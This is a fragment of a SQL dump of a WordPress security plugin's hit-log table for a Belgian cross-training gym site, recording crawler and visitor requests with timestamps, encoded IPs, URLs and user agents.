(72639, 1494831352.538114, 772030661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72640, 1494831356.329307, 772030661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72641, 1494831356.768656, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72642, 1494831359.355271, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72643, 1494831362.396035, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72644, 1494831364.775126, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72645, 1494831366.836339, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72646, 1494831369.431743, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72647, 1494831373.566834, 772030661, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)'),
(72648, 1494832025.690155, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72649, 1494832318.126615, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72650, 1494835612.277178, 2763076217, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.fr/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72651, 1494835615.389155, 2763076217, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(72652, 1494835653.072153, 1123632437, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72653, 1494838875.957370, 2637637384, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72654, 1494838876.104705, 2637637384, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72655, 1494841456.547105, 96260878, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72656, 1494841457.631009, 96260878, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72657, 1494841458.260601, 96260878, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72658, 1494841460.242959, 96260878, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72659, 1494841461.282869, 96260878, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72660, 1494841462.535189, 96260878, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72661, 1494841463.197684, 96260878, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72662, 1494844993.069008, 3233510666, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/license.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(72663, 1494844997.641842, 3233510666, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/license.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(72664, 1494846182.080304, 1407831882, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (CMS Crawler: http://www.cmscrawler.com)');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(72665, 1494853549.049803, 3267064321, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&sqi=2&ved=0ahUKEwig0pmq-_HTAhVPZlAKHQHmAlsQ_BcIiwEwEA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(72666, 1494857608.745680, 1538461267, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj5qY3EivLTAhWEWhoKHfIOBEkQFggjMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(72667, 1494857610.201864, 1538461267, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(72668, 1494857620.583297, 1538461267, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(72669, 1494857621.603446, 1538461267, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(72670, 1494857633.294932, 1538461267, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(72671, 1494859111.136401, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72672, 1494859111.843165, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72673, 1494859112.333811, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72674, 1494859112.881416, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72675, 1494859113.483967, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72676, 1494859114.001899, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72677, 1494859114.615761, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72678, 1494859115.112125, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72679, 1494859115.592128, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72680, 1494859116.085802, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72681, 1494859116.595841, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72682, 1494860963.769625, 1078646641, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '\\\'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\\\''),
(72683, 1494864343.493274, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72684, 1494864344.044102, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72685, 1494864672.802208, 1123632437, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72686, 1494864699.321499, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72687, 1494869839.516868, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(72688, 1494870076.317725, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72689, 1494872837.925699, 1123632437, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72690, 1494879255.334366, 783531305, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72691, 1494879255.916776, 783531305, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72692, 1494879256.417376, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72693, 1494879256.899901, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72694, 1494879257.373991, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72695, 1494879257.884135, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72696, 1494879258.478741, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72697, 1494879258.927836, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72698, 1494879259.403395, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72699, 1494879259.935203, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72700, 1494879260.414274, 783531305, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72701, 1494880488.768877, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72702, 1494882095.209162, 2637637384, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72703, 1494883221.185391, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72704, 1494883744.335437, 1538592159, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) GSA/26.0.154727556 Mobile/14E304 Safari/602.1'),
(72705, 1494884142.279859, 2637637384, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72706, 1494884989.627773, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72707, 1494885171.378957, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72708, 1494885762.303324, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72709, 1494886344.391133, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72710, 1494887065.075725, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72711, 1494887428.144346, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72712, 1494887740.106839, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72713, 1494888355.787293, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72714, 1494889011.761218, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72715, 1494889641.488213, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72716, 1494890190.317093, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72717, 1494890313.803347, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72718, 1494890988.672712, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72719, 1494891623.296908, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72720, 1494891623.388374, 1123633622, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72721, 1494893920.442925, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72722, 1494894567.190547, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/en-images/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72723, 1494894759.928239, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72724, 1494895069.399873, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72725, 1494895237.808261, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72726, 1494895908.290835, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72727, 1494896579.104577, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72728, 1494896780.321851, 2745959577, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(72729, 1494896865.334115, 2997442321, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/class-comments.php?blog=comments&title=American%20Power%20and%20Gas%20Reviews', 'http://www.crosstrainingcenter.be/wp-includes/class-comments.php?blog=comments&title=American%20Power%20and%20Gas%20Reviews', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(72730, 1494897201.197632, 2731721858, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(72731, 1494897205.366295, 2731721858, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(72732, 1494897207.319243, 2731721858, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(72733, 1494897213.501877, 2731721858, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)'),
(72734, 1494897288.508803, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72735, 1494897989.569736, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72736, 1494898472.667352, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72737, 1494898607.637991, 2637637627, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72738, 1494901045.661649, 3024883613, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(72739, 1494902069.092980, 1123633622, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72740, 1494906134.069651, 2637637514, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72741, 1494906205.189629, 2637637514, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72742, 1494906768.742188, 2637637514, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72743, 1494906919.858525, 2637637514, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/author/admin/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(72744, 1494906959.396733, 1123633622, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(72745, 1494909815.907945, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.1.30 (KHTML, like Gecko)'),
(72746, 1494909816.513551, 1374841142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72747, 1494909817.234521, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72748, 1494909817.754097, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72749, 1494909818.245068, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72750, 1494909818.841277, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72751, 1494909819.616280, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72752, 1494909820.575947, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(72753, 1494909821.518520, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72754, 1494909822.379549, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72755, 1494909822.901626, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72756, 1494909823.506634, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72757, 1494909832.291338, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72758, 1494909832.731609, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(72759, 1494912730.528529, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(72760, 1494912731.133696, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72761, 1494912731.568695, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72762, 1494912732.003176, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72763, 1494912732.462590, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72764, 1494912732.910162, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(72765, 1494912733.675317, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
